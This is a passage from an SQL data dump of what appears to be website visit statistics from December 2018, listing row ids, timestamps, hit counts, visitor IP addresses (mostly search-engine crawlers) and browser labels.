.42','chrome'),(350530,1544601288,2,2,0,0,'91.196.178.86','firefox'),(350531,1544601346,1,1,0,0,'95.163.255.99','other'),(350532,1544601348,1,1,0,0,'95.163.255.97','other'),(350533,1544601364,1,1,0,0,'54.36.149.61','other'),(350534,1544601498,1,1,0,0,'207.46.13.182','other'),(350535,1544601685,1,1,0,0,'62.205.134.182','msie'),(350536,1544601690,2,2,0,0,'91.124.182.170','firefox'),(350537,1544601771,1,1,0,0,'54.36.149.16','other'),(350538,1544601878,1,1,0,0,'54.36.149.31','other'),(350539,1544602412,1,1,0,0,'54.36.148.205','other'),(350540,1544602752,1,1,0,0,'54.36.149.4','other'),(350541,1544602778,1,1,0,0,'95.163.255.153','other'),(350542,1544602784,1,1,0,0,'95.163.255.197','other'),(350543,1544602839,1,1,0,0,'66.249.66.156','chrome'),(350544,1544602840,1,1,0,0,'66.249.66.152','chrome'),(350545,1544603784,2,2,0,0,'66.249.66.152','chrome'),(350546,1544604284,1,1,0,0,'46.211.90.197','chrome'),(350547,1544604386,2,2,0,0,'66.249.66.157','chrome'),(350549,1544604407,2,2,0,0,'212.87.168.24','chrome'),(350550,1544604452,1,1,0,0,'91.196.178.86','firefox'),(350551,1544604499,1,1,0,0,'66.249.66.156','chrome'),(350552,1544604965,2,2,0,0,'66.249.66.44','chrome'),(350553,1544605106,3,3,0,0,'178.93.119.177','chrome'),(350554,1544605137,4,4,0,0,'91.196.178.104','chrome'),(350555,1544605227,1,1,0,0,'66.249.66.154','chrome'),(350556,1544605281,1,1,0,0,'31.13.127.6','other'),(350557,1544605282,1,1,0,0,'31.13.127.3','other'),(350558,1544605288,1,1,0,0,'31.13.127.7','other'),(350559,1544605312,1,1,0,0,'173.252.127.40','other'),(350560,1544605381,1,1,0,0,'91.196.178.86','firefox'),(350561,1544605465,1,1,0,0,'66.249.66.42','chrome'),(350562,1544605566,2,2,0,0,'91.196.178.90','chrome'),(350563,1544605570,3,3,0,0,'144.76.137.254','other'),(350564,1544605627,1,1,0,0,'54.36.148.214','other'),(350565,1544605676,2,2,0,0,'91.196.178.72','chrome'),(350566,1544606045,1,1,0,0,'66.249.66.156','chrome'),(350567,1544606213,2,2,0,0,'199.58.86.209','other'),(350568,1544606327,1,1,0,0,'87.250.224.47','other'),(350569,1544606521,1,1,0,0,'37.55.225.27','chrome'),(350570,1544606523,1,1,0,0,'207.46.13.182','other'),(350571,1544606559,2,2,0,0,'91.196.178.104','chrome'),(350572,1544606667,1,1,0,0,'82.207.49.54','chrome'),(350573,1544606747,5,5,0,0,'5.45.207.79','other'),(350574,1544606751,1,1,0,0,'95.108.213.4','other'),(350576,1544606752,1,1,0,0,'141.8.142.103','other'),(350577,1544606807,1,1,0,0,'54.36.148.215','other'),(350578,1544606850,1,1,0,0,'66.249.66.40','chrome'),(350579,1544606857,3,3,0,0,'178.154.244.11','other'),(350580,1544607303,3,3,0,0,'91.196.178.86','firefox'),(350581,1544607308,1,1,0,0,'5.45.207.19','other'),(350582,1544607374,2,2,0,0,'87.250.224.47','other'),(350583,1544607384,2,2,0,0,'66.249.66.156','chrome'),(350584,1544607527,1,1,0,0,'37.9.113.20','other'),(350585,1544607548,1,1,0,0,'95.163.255.98','other'),(350586,1544607551,1,1,0,0,'95.163.255.92','other'),(350587,1544607766,1,1,0,0,'54.36.148.84','other'),(350588,1544607842,2,2,0,0,'178.154.244.11','other'),(350589,1544607854,2,2,0,0,'141.8.142.103','other'),(350590,1544607897,2,2,0,0,'5.45.207.79','other'),(350591,1544607997,1,1,0,0,'66.249.66.157','chrome'),(350592,1544608017,1,1,0,0,'66.249.66.61','chrome'),(350593,1544608018,1,1,0,0,'66.249.66.44','chrome'),(350594,1544608036,5,5,0,0,'91.196.178.90','chrome'),(350595,1544608256,1,1,0,0,'5.45.207.19','other'),(350596,1544608343,1,1,0,0,'66.249.66.57','chrome'),(350597,1544608344,1,1,0,0,'66.249.66.40','chrome'),(350598,1544608489,1,1,0,0,'91.196.178.86','firefox'),(350599,1544609143,1,1,0,0,'5.188.210.53','chrome'),(350600,1544609188,1,1,0,0,'178.154.244.11','other'),(350601,1544609356,1,1,0,0,'66.249.66.157','chrome'),(350602,1544609357,2,2,0,0,'66.249.66.156','chrome'),(350603,1544609362,2,2,0,0,'66.249.66.152','chrome'),(350604,1544609366,2,2,0,0,'66.249.66.155','chrome'),(350605,1544609512,1,1,0,0,'176.125.40.135','other'),(350606,1544609532,1,1,0,0,'54.36.149.73','other'),(350607,1544609805,1,1,0,0,'91.196.178.86','firefox'),(350608,1544609945,1,1,0,0,'66.249.66.154','chrome'),(350609,1544610537,1,1,0,0,'66.249.66.44','chrome'),(350610,1544610768,2,2,0,0,'8.29.198.26','other'),(350611,1544610858,1,1,0,0,'66.249.66.155','chrome'),(350612,1544610859,2,2,0,0,'66.249.66.154','chrome'),(350613,1544611371,2,2,0,0,'207.46.13.180','other'),(350614,1544611555,1,1,0,0,'46.211.71.67','chrome'),(350615,1544611753,1,1,0,0,'54.36.148.116','other'),(350616,1544611812,2,2,0,0,'91.196.178.86','firefox'),(350617,1544611852,1,1,0,0,'91.196.178.94','chrome'),(350618,1544612295,1,1,0,0,'95.163.255.153','other'),(350619,1544612297,1,1,0,0,'95.163.255.182','other'),(350620,1544612503,1,1,0,0,'176.125.40.135','other'),(350621,1544612518,1,1,0,0,'66.249.66.42','chrome'),(350622,1544612534,1,1,0,0,'95.163.255.195','other'),(350623,1544612537,1,1,0,0,'95.163.255.164','other'),(350624,1544612687,2,2,0,0,'66.249.66.40','chrome'),(350625,1544612714,1,1,0,0,'94.179.21.125','chrome'),(350626,1544612748,1,1,0,0,'13.57.233.99','chrome'),(350627,1544612815,1,1,0,0,'46.229.168.140','other'),(350628,1544613039,2,2,0,0,'91.196.178.86','firefox'),(350629,1544613075,1,1,0,0,'54.36.149.38','other'),(350630,1544613323,1,1,0,0,'46.229.168.132','other'),(350631,1544613843,1,1,0,0,'54.36.149.55','other'),(350632,1544614487,1,1,0,0,'66.249.66.156','chrome'),(350634,1544614680,2,2,0,0,'66.249.66.152','chrome'),(350635,1544615282,2,2,0,0,'66.249.66.157','chrome'),(350636,1544615463,1,1,0,0,'95.163.255.176','other'),(350637,1544615466,1,1,0,0,'95.163.255.174','other'),(350638,1544615653,1,1,0,0,'66.249.66.154','chrome'),(350639,1544615925,1,1,0,0,'5.45.207.79','other'),(350640,1544615926,1,1,0,0,'87.250.224.47','other'),(350641,1544615929,1,1,0,0,'5.45.207.19','other'),(350643,1544617117,1,1,0,0,'54.36.148.224','other'),(350644,1544617480,1,1,0,0,'95.163.255.98','other'),(350645,1544617558,1,1,0,0,'66.249.66.40','chrome'),(350646,1544618086,4,4,0,0,'5.45.207.79','other'),(350647,1544618214,1,1,0,0,'66.249.66.152','chrome'),(350648,1544618425,1,1,0,0,'185.11.31.120','firefox'),(350649,1544618437,1,1,0,0,'66.249.66.154','chrome'),(350650,1544618675,2,2,0,0,'62.80.189.26','chrome'),(350651,1544618702,3,3,0,0,'178.154.244.11','other'),(350652,1544618733,1,1,0,0,'37.9.113.20','other'),(350653,1544618751,1,1,0,0,'54.36.148.70','other'),(350654,1544618884,1,1,0,0,'95.132.185.215','chrome'),(350655,1544618888,1,1,0,0,'95.108.213.4','other'),(350656,1544618926,3,3,0,0,'141.8.142.103','other'),(350657,1544619056,1,1,0,0,'95.133.59.65','chrome'),(350658,1544619321,1,1,0,0,'37.55.225.27','chrome'),(350659,1544619409,2,2,0,0,'66.249.66.156','chrome'),(350660,1544619432,1,1,0,0,'185.126.252.157','chrome'),(350661,1544619540,1,1,0,0,'91.196.178.86','firefox'),(350662,1544619795,1,1,0,0,'207.46.13.179','other'),(350663,1544619974,1,1,0,0,'54.36.149.53','other'),(350664,1544620033,1,1,0,0,'66.249.66.157','chrome'),(350665,1544620201,1,1,0,0,'66.102.9.38','chrome'),(350667,1544620313,1,1,0,0,'35.187.132.181','chrome'),(350668,1544620315,1,1,0,0,'35.187.132.182','chrome'),(350669,1544620316,1,1,0,0,'54.36.149.70','other'),(350670,1544620349,1,1,0,0,'46.229.168.151','other'),(350671,1544620355,1,1,0,0,'54.36.148.170','other'),(350672,1544620766,1,1,0,0,'66.249.66.154','chrome'),(350673,1544620848,1,1,0,0,'66.249.66.195','chrome'),(350675,1544620947,1,1,0,0,'66.249.66.40','chrome'),(350676,1544621122,1,1,0,0,'46.229.168.154','other'),(350677,1544621261,1,1,0,0,'95.163.255.151','other'),(350678,1544621265,1,1,0,0,'95.163.255.182','other'),(350679,1544621326,1,1,0,0,'107.178.45.236','other'),(350680,1544621335,1,1,0,0,'107.178.40.242','chrome'),(350681,1544621536,2,2,0,0,'54.36.148.71','other'),(350682,1544621576,1,1,0,0,'54.36.148.152','other'),(350683,1544621611,2,2,0,0,'8.29.198.25','other'),(350684,1544621647,1,1,0,0,'207.46.13.181','other'),(350685,1544621649,3,3,0,0,'91.196.178.170','chrome'),(350686,1544621673,2,2,0,0,'91.196.178.90','firefox'),(350687,1544621855,1,1,0,0,'95.163.255.99','other'),(350688,1544621858,1,1,0,0,'95.163.255.93','other'),(350689,1544622120,2,2,0,0,'66.249.66.156','chrome'),(350691,1544622380,1,1,0,0,'66.249.66.155','chrome'),(350692,1544622535,1,1,0,0,'46.229.168.150','other'),(350693,1544622556,1,1,0,0,'54.36.148.202','other'),(350694,1544623014,1,1,0,0,'46.229.168.148','other'),(350695,1544623060,1,1,0,0,'66.249.66.40','chrome'),(350696,1544623190,1,1,0,0,'91.196.178.170','chrome'),(350697,1544623220,1,1,0,0,'54.36.148.91','other'),(350698,1544623361,1,1,0,0,'54.36.148.137','other'),(350699,1544623458,1,1,0,0,'66.249.66.156','chrome'),(350701,1544623476,1,1,0,0,'66.249.66.154','chrome'),(350702,1544623526,1,1,0,0,'95.163.255.94','other'),(350703,1544623529,1,1,0,0,'95.163.255.96','other'),(350704,1544624188,1,1,0,0,'46.229.168.152','other'),(350705,1544624194,1,1,0,0,'178.93.62.88','firefox'),(350706,1544624263,1,1,0,0,'46.166.137.200','other'),(350707,1544624351,1,1,0,0,'37.55.225.27','chrome'),(350708,1544624706,1,1,0,0,'207.46.13.181','other'),(350709,1544624710,2,2,0,0,'207.46.13.179','other'),(350710,1544624866,1,1,0,0,'54.36.148.191','other'),(350711,1544625105,2,2,0,0,'91.196.178.86','firefox'),(350712,1544625139,1,1,0,0,'46.200.50.238','chrome'),(350713,1544625357,2,2,0,0,'91.196.178.94','chrome'),(350714,1544625479,1,1,0,0,'95.108.213.4','other'),(350715,1544625702,2,2,0,0,'66.249.66.156','chrome'),(350716,1544626062,1,1,0,0,'185.120.89.45','chrome'),(350717,1544626239,1,1,0,0,'46.229.168.130','other'),(350718,1544626659,1,1,0,0,'37.53.178.17','chrome'),(350719,1544626670,1,1,0,0,'66.249.66.155','chrome'),(350720,1544626671,2,2,0,0,'66.249.66.152','chrome'),(350721,1544627001,1,1,0,0,'66.249.66.154','chrome'),(350722,1544627238,4,0,4,0,'37.187.26.42',''),(350723,1544627697,1,1,0,0,'178.95.246.220','chrome'),(350724,1544627727,2,2,0,0,'207.46.13.181','other'),(350725,1544627834,2,2,0,0,'141.8.142.103','other'),(350726,1544627840,1,1,0,0,'37.9.113.148','other'),(350727,1544627872,1,1,0,0,'23.229.13.213','chrome'),(350728,1544628008,1,1,0,0,'178.154.171.88','other'),(350729,1544628120,1,1,0,0,'5.45.207.19','other'),(350730,1544628241,1,1,0,0,'66.249.66.152','chrome'),(350731,1544628258,1,1,0,0,'178.154.244.11','other'),(350732,1544628295,1,1,0,0,'46.229.168.132','other'),(350733,1544628318,1,1,0,0,'46.229.168.138','other'),(350734,1544628320,1,1,0,0,'46.229.168.135','other'),(350735,1544628524,1,1,0,0,'5.45.207.79','other'),(350736,1544628674,1,1,0,0,'95.163.255.180','other'),(350737,1544628678,1,1,0,0,'95.163.255.187','other'),(350738,1544628866,2,2,0,0,'207.46.13.180','other'),(350739,1544628923,2,2,0,0,'91.196.178.59','chrome'),(350740,1544629264,1,1,0,0,'66.249.66.156','chrome'),(350741,1544629338,1,1,0,0,'66.249.66.152','chrome'),(350742,1544629350,1,1,0,0,'46.229.168.129','other'),(350743,1544629353,1,1,0,0,'54.36.149.47','other'),(350744,1544629414,1,1,0,0,'66.249.79.89','chrome'),(350745,1544629432,1,1,0,0,'66.249.79.72','chrome'),(350746,1544629538,1,1,0,0,'207.46.13.181','other'),(350747,1544629576,1,1,0,0,'46.229.168.151','other'),(350748,1544629578,1,1,0,0,'46.229.168.132','other'),(350749,1544629759,2,2,0,0,'5.45.207.79','other'),(350750,1544629773,2,2,0,0,'66.249.79.190','chrome'),(350751,1544630304,1,1,0,0,'54.36.148.11','other'),(350752,1544630347,1,1,0,0,'66.249.79.183','chrome'),(350753,1544631612,1,1,0,0,'54.36.148.18','other'),(350754,1544632102,1,1,0,0,'95.163.255.153','other'),(350755,1544632104,1,1,0,0,'95.163.255.196','other'),(350756,1544632123,1,1,0,0,'95.163.255.62','other'),(350757,1544632129,1,1,0,0,'95.163.255.68','other'),(350758,1544632278,1,1,0,0,'66.249.66.155','chrome'),(350759,1544632279,1,1,0,0,'66.249.66.152','chrome'),(350760,1544632405,1,1,0,0,'66.249.66.57','chrome'),(350762,1544632454,2,2,0,0,'8.29.198.25','other'),(350763,1544632620,2,2,0,0,'207.46.13.181','other'),(350764,1544632665,1,1,0,0,'37.54.21.87','other'),(350765,1544632758,1,1,0,0,'207.46.13.180','other'),(350766,1544632982,2,2,0,0,'66.249.66.156','chrome'),(350767,1544633170,1,1,0,0,'54.36.148.203','other'),(350768,1544633505,1,1,0,0,'95.163.255.66','other'),(350769,1544633508,1,1,0,0,'95.163.255.65','other'),(350770,1544633518,1,1,0,0,'207.46.13.182','other'),(350771,1544633738,1,1,0,0,'94.178.147.167','chrome'),(350772,1544633909,1,1,0,0,'5.45.207.79','other'),(350773,1544634085,1,1,0,0,'95.163.255.97','other'),(350774,1544634088,1,1,0,0,'95.163.255.95','other'),(350775,1544634210,1,1,0,0,'178.154.244.11','other'),(350776,1544634439,1,1,0,0,'5.45.207.19','other'),(350777,1544634498,2,2,0,0,'46.211.123.210','chrome'),(350778,1544634793,1,1,0,0,'46.229.168.138','other'),(350779,1544634899,1,1,0,0,'207.46.13.181','other'),(350780,1544634986,1,1,0,0,'207.46.13.180','other'),(350781,1544635159,1,1,0,0,'46.229.168.141','other'),(350782,1544635210,3,3,0,0,'66.249.66.154','chrome'),(350783,1544635278,1,1,0,0,'66.249.66.157','chrome'),(350784,1544636711,1,1,0,0,'5.45.207.79','other'),(350785,1544636773,1,1,0,0,'66.249.66.157','chrome'),(350786,1544636777,1,1,0,0,'66.249.66.154','chrome'),(350787,1544636999,1,1,0,0,'66.249.66.42','chrome'),(350788,1544637090,1,1,0,0,'141.8.142.103','other'),(350789,1544637145,1,1,0,0,'91.196.178.42','chrome'),(350790,1544637590,2,2,0,0,'207.46.13.179','other'),(350791,1544638039,9,9,0,0,'5.45.207.19','other'),(350792,1544638098,1,1,0,0,'66.249.66.152','chrome'),(350793,1544638135,12,12,0,0,'178.154.244.11','other'),(350794,1544638256,1,1,0,0,'54.36.149.89','other'),(350795,1544638291,1,1,0,0,'95.163.255.97','other'),(350796,1544638293,1,1,0,0,'54.36.148.151','other'),(350798,1544638323,7,7,0,0,'141.8.142.103','other'),(350799,1544638348,5,5,0,0,'5.45.207.79','other'),(350800,1544638395,1,1,0,0,'207.46.13.181','other'),(350801,1544638459,4,4,0,0,'95.108.213.4','other'),(350802,1544638470,1,1,0,0,'46.229.168.147','other'),(350803,1544638506,1,1,0,0,'87.250.224.47','other'),(350804,1544638549,1,1,0,0,'66.249.66.61','chrome'),(350805,1544638550,1,1,0,0,'66.249.66.42','chrome'),(350806,1544638563,1,1,0,0,'37.9.113.103','other'),(350807,1544638565,2,2,0,0,'37.9.113.148','other'),(350808,1544638907,1,1,0,0,'66.249.66.156','chrome'),(350809,1544638908,1,1,0,0,'207.46.13.179','other'),(350810,1544638937,1,1,0,0,'54.36.148.18','other'),(350811,1544639015,1,1,0,0,'66.249.66.44','chrome'),(350812,1544639325,3,3,0,0,'178.154.244.11','other'),(350813,1544639428,1,1,0,0,'46.229.168.145','other'),(350814,1544639431,1,1,0,0,'46.229.168.141','other'),(350815,1544639628,1,1,0,0,'54.36.148.118','other'),(350816,1544639749,1,1,0,0,'180.76.15.138','other'),(350817,1544639779,3,3,0,0,'141.8.142.103','other'),(350818,1544639896,1,1,0,0,'213.109.132.174','chrome'),(350819,1544640162,1,1,0,0,'95.163.255.159','other'),(350820,1544640167,1,1,0,0,'95.163.255.178','other'),(350821,1544640222,3,3,0,0,'207.46.13.182','other'),(350822,1544640545,1,1,0,0,'5.45.207.79','other'),(350823,1544640820,1,1,0,0,'66.249.66.154','chrome'),(350824,1544640931,1,1,0,0,'46.229.168.145','other'),(350825,1544641113,1,1,0,0,'66.249.66.156','chrome'),(350826,1544641488,1,1,0,0,'93.73.95.230','chrome'),(350827,1544641739,1,1,0,0,'87.250.224.47','other'),(350828,1544641806,1,1,0,0,'46.229.168.154','other'),(350829,1544641841,1,1,0,0,'54.36.148.210','other'),(350830,1544641974,2,2,0,0,'91.196.178.189','chrome'),(350831,1544642296,1,1,0,0,'207.46.13.179','other'),(350832,1544642510,1,1,0,0,'46.229.168.142','other'),(350833,1544642618,1,1,0,0,'141.8.142.103','other'),(350834,1544642756,1,1,0,0,'66.249.66.42','chrome'),(350835,1544642817,1,1,0,0,'54.36.148.83','other'),(350836,1544643114,1,1,0,0,'207.46.13.181','other'),(350837,1544643126,1,1,0,0,'46.229.168.140','other'),(350838,1544643128,1,1,0,0,'46.229.168.153','other'),(350839,1544643295,1,1,0,0,'8.29.198.25','other'),(350840,1544643310,1,1,0,0,'8.29.198.26','other'),(350841,1544643473,1,1,0,0,'5.45.207.19','other'),(350842,1544643484,3,3,0,0,'5.45.207.79','other'),(350843,1544643995,1,1,0,0,'207.46.13.179','other'),(350844,1544644055,1,1,0,0,'207.46.13.99','other'),(350845,1544644183,1,1,0,0,'178.154.244.11','other'),(350846,1544644270,1,1,0,0,'141.8.142.108','other'),(350847,1544644271,1,1,0,0,'54.36.148.22','other'),(350848,1544644284,1,1,0,0,'46.229.168.140','other'),(350849,1544644289,1,1,0,0,'46.229.168.152','other'),(350850,1544644345,1,1,0,0,'66.249.66.156','chrome'),(350851,1544644357,2,2,0,0,'66.249.66.154','chrome'),(350852,1544644394,1,1,0,0,'54.36.149.26','other'),(350853,1544644524,1,1,0,0,'46.229.168.141','other'),(350854,1544644625,2,2,0,0,'66.249.66.155','chrome'),(350855,1544644638,1,1,0,0,'66.249.66.152','chrome'),(350856,1544644706,3,3,0,0,'66.249.66.157','chrome'),(350857,1544644950,1,1,0,0,'207.46.13.182','other'),(350858,1544644958,1,1,0,0,'207.46.13.180','other'),(350859,1544645320,1,1,0,0,'207.46.13.179','other'),(350860,1544645373,1,1,0,0,'54.36.148.182','other'),(350861,1544645439,2,2,0,0,'66.249.66.154','chrome'),(350862,1544645465,2,2,0,0,'157.55.39.98','other'),(350863,1544645576,1,1,0,0,'95.163.255.97','other'),(350864,1544645578,1,1,0,0,'95.163.255.94','other'),(350865,1544645605,1,1,0,0,'54.36.149.21','other'),(350866,1544645607,2,2,0,0,'66.249.66.156','chrome'),(350867,1544645669,1,1,0,0,'66.249.66.44','chrome'),(350868,1544645678,1,1,0,0,'95.108.181.54','other'),(350869,1544645681,1,1,0,0,'37.9.113.20','other'),(350870,1544646139,1,1,0,0,'46.229.168.139','other'),(350871,1544647423,2,2,0,0,'5.45.207.79','other'),(350872,1544647491,1,1,0,0,'207.46.13.181','other'),(350873,1544647492,1,1,0,0,'178.154.244.11','other'),(350874,1544647610,1,1,0,0,'66.249.66.152','chrome'),(350875,1544647760,2,2,0,0,'91.196.178.133','chrome'),(350876,1544647883,2,2,0,0,'46.229.168.145','other'),(350877,1544647888,1,1,0,0,'46.229.168.144','other'),(350878,1544648046,1,1,0,0,'54.189.237.32','chrome'),(350879,1544648110,1,1,0,0,'54.36.149.80','other'),(350880,1544648187,1,1,0,0,'80.246.130.154','chrome'),(350881,1544648216,2,2,0,0,'5.45.207.19','other'),(350882,1544648534,10,10,0,0,'178.154.244.11','other'),(350883,1544648541,2,2,0,0,'95.108.213.4','other'),(350884,1544648553,4,4,0,0,'141.8.142.103','other'),(350885,1544648586,8,8,0,0,'5.45.207.79','other'),(350886,1544648639,1,1,0,0,'37.9.113.148','other'),(350887,1544648758,1,1,0,0,'46.229.168.136','other'),(350888,1544648761,1,1,0,0,'46.229.168.140','other'),(350889,1544648806,1,1,0,0,'66.249.66.152','chrome'),(350890,1544648871,1,1,0,0,'157.55.39.98','other'),(350891,1544648888,1,1,0,0,'54.36.148.128','other'),(350892,1544649022,2,2,0,0,'3.80.177.176','other'),(350893,1544649179,2,2,0,0,'5.45.207.19','other'),(350894,1544649303,1,1,0,0,'92.113.55.199','chrome'),(350895,1544649555,1,1,0,0,'46.229.168.137','other'),(350896,1544649692,1,1,0,0,'141.8.142.103','other'),(350897,1544649772,2,2,0,0,'207.46.13.180','other'),(350898,1544649810,1,1,0,0,'157.55.39.98','other'),(350899,1544649891,1,1,0,0,'5.45.207.79','other'),(350900,1544650112,1,1,0,0,'213.180.203.9','other'),(350901,1544650513,1,1,0,0,'66.249.66.154','chrome'),(350902,1544650533,2,2,0,0,'66.249.66.152','chrome'),(350903,1544650781,1,1,0,0,'66.249.66.155','chrome'),(350904,1544650814,1,1,0,0,'207.46.13.181','other'),(350905,1544650974,1,1,0,0,'207.46.13.179','other'),(350906,1544650989,1,1,0,0,'157.55.39.98','other'),(350907,1544651004,1,1,0,0,'87.250.224.65','other'),(350908,1544651005,1,1,0,0,'37.9.113.103','other'),(350909,1544651008,1,1,0,0,'5.45.207.19','other'),(350910,1544651020,1,1,0,0,'37.9.113.148','other'),(350911,1544651360,1,1,0,0,'54.36.148.50','other'),(350912,1544651451,1,1,0,0,'46.229.168.134','other'),(350913,1544651454,1,1,0,0,'46.229.168.139','other'),(350914,1544651833,1,1,0,0,'54.36.149.13','other'),(350915,1544652098,1,1,0,0,'54.36.149.45','other'),(350916,1544652331,2,2,0,0,'207.46.13.179','other'),(350917,1544652855,1,1,0,0,'54.36.149.0','other'),(350918,1544653159,1,1,0,0,'37.52.114.91','other'),(350919,1544653222,1,1,0,0,'207.46.13.35','other'),(350920,1544653358,1,1,0,0,'5.45.207.79','other'),(350921,1544653471,3,3,0,0,'178.154.244.11','other'),(350922,1544653611,1,1,0,0,'66.249.66.42','chrome'),(350923,1544654125,1,1,0,0,'8.29.198.27','other'),(350924,1544654140,1,1,0,0,'37.9.113.20','other'),(350925,1544654151,1,1,0,0,'8.29.198.26','other'),(350926,1544654337,1,1,0,0,'207.46.13.34','other'),(350927,1544654439,1,1,0,0,'54.36.148.160','other'),(350928,1544654560,1,1,0,0,'54.36.149.46','other'),(350929,1544654583,1,1,0,0,'95.163.255.164','other'),(350930,1544654586,1,1,0,0,'95.163.255.186','other'),(350931,1544654742,1,1,0,0,'46.229.168.129','other'),(350932,1544654766,1,1,0,0,'66.249.66.154','chrome'),(350933,1544654965,1,1,0,0,'66.249.66.40','chrome'),(350934,1544655198,2,2,0,0,'66.249.66.155','chrome'),(350936,1544655396,1,1,0,0,'54.36.149.96','other'),(350937,1544655418,1,1,0,0,'46.229.168.135','other'),(350938,1544655623,1,1,0,0,'193.93.53.167','firefox'),(350939,1544655882,1,1,0,0,'66.249.66.156','chrome'),(350940,1544655905,1,1,0,0,'5.45.207.79','other'),(350941,1544656123,1,1,0,0,'95.163.255.94','other'),(350942,1544656137,1,1,0,0,'207.46.13.36','other'),(350943,1544656626,1,1,0,0,'95.163.255.93','other'),(350944,1544656629,1,1,0,0,'95.163.255.92','other'),(350945,1544657660,1,1,0,0,'141.8.132.16','other'),(350946,1544657706,1,1,0,0,'54.36.149.100','other'),(350947,1544658067,1,1,0,0,'95.108.181.83','other'),(350948,1544658127,1,1,0,0,'46.229.168.144','other'),(350949,1544658277,1,1,0,0,'141.8.142.162','other'),(350950,1544658405,1,1,0,0,'95.108.181.54','other'),(350951,1544658684,1,1,0,0,'66.249.66.59','chrome'),(350952,1544658685,1,1,0,0,'66.249.66.40','chrome'),(350953,1544658814,1,1,0,0,'54.36.148.166','other'),(350954,1544658994,1,1,0,0,'54.36.148.185','other'),(350955,1544659161,1,1,0,0,'66.249.66.157','chrome'),(350956,1544659168,1,1,0,0,'66.249.66.152','chrome'),(350957,1544659454,1,1,0,0,'141.8.142.144','other'),(350958,1544659544,1,1,0,0,'66.249.66.154','chrome'),(350959,1544659552,2,2,0,0,'95.108.213.4','other'),(350960,1544659587,1,1,0,0,'54.36.148.113','other'),(350961,1544659639,1,1,0,0,'141.8.142.38','other'),(350962,1544659865,2,2,0,0,'66.249.66.156','chrome'),(350963,1544659883,1,1,0,0,'66.249.66.57','chrome'),(350964,1544660053,1,1,0,0,'87.250.224.47','other'),(350965,1544660086,3,3,0,0,'5.45.207.19','other'),(350966,1544660106,3,3,0,0,'141.8.142.103','other'),(350967,1544660124,1,1,0,0,'87.250.224.107','other'),(350968,1544660126,5,5,0,0,'5.45.207.79','other'),(350969,1544660153,1,1,0,0,'178.154.244.65','other'),(350970,1544660180,1,1,0,0,'178.154.244.11','other'),(350971,1544660220,1,1,0,0,'95.108.181.75','other'),(350972,1544660239,1,1,0,0,'95.108.181.54','other'),(350973,1544660264,1,1,0,0,'5.45.207.76','other'),(350974,1544660313,1,1,0,0,'37.9.113.20','other'),(350975,1544661078,2,2,0,0,'66.249.66.157','chrome'),(350976,1544661088,3,3,0,0,'66.249.66.152','chrome'),(350977,1544661244,1,1,0,0,'54.36.148.31','other'),(350978,1544661281,1,1,0,0,'46.229.168.151','other'),(350979,1544661718,1,1,0,0,'66.249.66.154','chrome'),(350980,1544662264,2,2,0,0,'207.46.13.34','other'),(350981,1544662558,1,1,0,0,'178.20.55.16','other'),(350982,1544662693,1,1,0,0,'66.249.66.157','chrome'),(350983,1544662694,1,1,0,0,'66.249.66.154','chrome'),(350984,1544663366,1,1,0,0,'54.36.148.140','other'),(350985,1544663449,1,1,0,0,'46.229.168.136','other'),(350986,1544664131,1,1,0,0,'54.36.148.117','other'),(350987,1544664168,1,1,0,0,'54.36.149.4','other'),(350988,1544664277,2,2,0,0,'66.249.66.152','chrome'),(350989,1544664446,1,1,0,0,'46.229.168.153','other'),(350990,1544664665,1,1,0,0,'207.46.13.37','other'),(350991,1544664858,1,1,0,0,'66.249.66.155','chrome'),(350992,1544664963,1,1,0,0,'8.29.198.26','other'),(350993,1544664983,1,1,0,0,'8.29.198.25','other'),(350994,1544665505,1,1,0,0,'66.249.66.157','chrome'),(350995,1544665506,1,1,0,0,'66.249.66.154','chrome'),(350996,1544665821,2,2,0,0,'207.46.13.34','other'),(350997,1544666049,1,1,0,0,'54.36.148.221','other'),(350998,1544666406,1,1,0,0,'66.249.66.156','chrome'),(350999,1544666415,1,1,0,0,'66.249.66.152','chrome'),(351000,1544666481,1,1,0,0,'54.36.149.31','other'),(351001,1544667160,2,2,0,0,'54.165.59.7','other'),(351002,1544667175,1,1,0,0,'178.154.244.11','other'),(351003,1544667334,2,2,0,0,'207.46.13.35','other'),(351004,1544667339,1,1,0,0,'66.249.66.156','chrome'),(351005,1544667549,1,1,0,0,'46.229.168.129','other'),(351006,1544667615,1,1,0,0,'66.249.66.155','chrome'),(351007,1544667621,1,1,0,0,'66.249.66.152','chrome'),(351008,1544668295,1,1,0,0,'5.45.207.19','other'),(351009,1544668490,5,5,0,0,'178.154.244.11','other'),(351010,1544668628,1,1,0,0,'95.108.213.4','other'),(351011,1544668674,2,2,0,0,'5.45.207.79','other'),(351012,1544668825,1,1,0,0,'54.36.148.48','other'),(351013,1544669113,1,1,0,0,'141.8.142.103','other'),(351014,1544669723,2,2,0,0,'178.154.244.11','other'),(351015,1544669802,1,1,0,0,'46.229.168.145','other'),(351016,1544669813,1,1,0,0,'54.165.59.7','other'),(351017,1544669945,1,1,0,0,'95.108.181.54','other'),(351018,1544669976,1,1,0,0,'207.46.13.35','other'),(351019,1544670136,1,1,0,0,'213.180.203.40','other'),(351020,1544670163,1,1,0,0,'5.255.253.22','other'),(351021,1544670171,2,2,0,0,'95.108.181.83','other'),(351022,1544670204,1,1,0,0,'87.250.224.65','other'),(351023,1544670216,1,1,0,0,'207.46.13.182','other'),(351024,1544670420,101,101,0,0,'144.76.81.229','other'),(351025,1544671037,1,1,0,0,'54.165.59.7','other'),(351026,1544671724,1,1,0,0,'54.36.148.21','other'),(351027,1544671764,2,2,0,0,'34.214.7.248','chrome'),(351028,1544671816,1,1,0,0,'54.36.148.203','other'),(351030,1544672157,1,1,0,0,'54.36.148.96','other'),(351031,1544672430,2,2,0,0,'141.8.142.103','other'),(351032,1544672549,1,1,0,0,'95.163.255.106','other'),(351033,1544672555,1,1,0,0,'95.163.255.116','other'),(351034,1544672566,1,1,0,0,'95.163.255.115','other'),(351035,1544672572,1,1,0,0,'95.163.255.107','other'),(351036,1544672580,2,2,0,0,'95.163.255.102','other'),(351037,1544672588,1,1,0,0,'95.163.255.119','other'),(351038,1544672595,1,1,0,0,'95.163.255.118','other'),(351039,1544672601,1,1,0,0,'95.163.255.117','other'),(351040,1544672616,2,2,0,0,'95.163.255.109','other'),(351041,1544672623,1,1,0,0,'95.163.255.104','other'),(351042,1544672975,1,1,0,0,'207.46.13.35','other'),(351043,1544673231,2,2,0,0,'5.45.207.79','other'),(351044,1544673440,2,2,0,0,'178.154.244.11','other'),(351045,1544673483,1,1,0,0,'207.46.13.36','other'),(351046,1544673946,1,1,0,0,'66.249.66.156','chrome'),(351047,15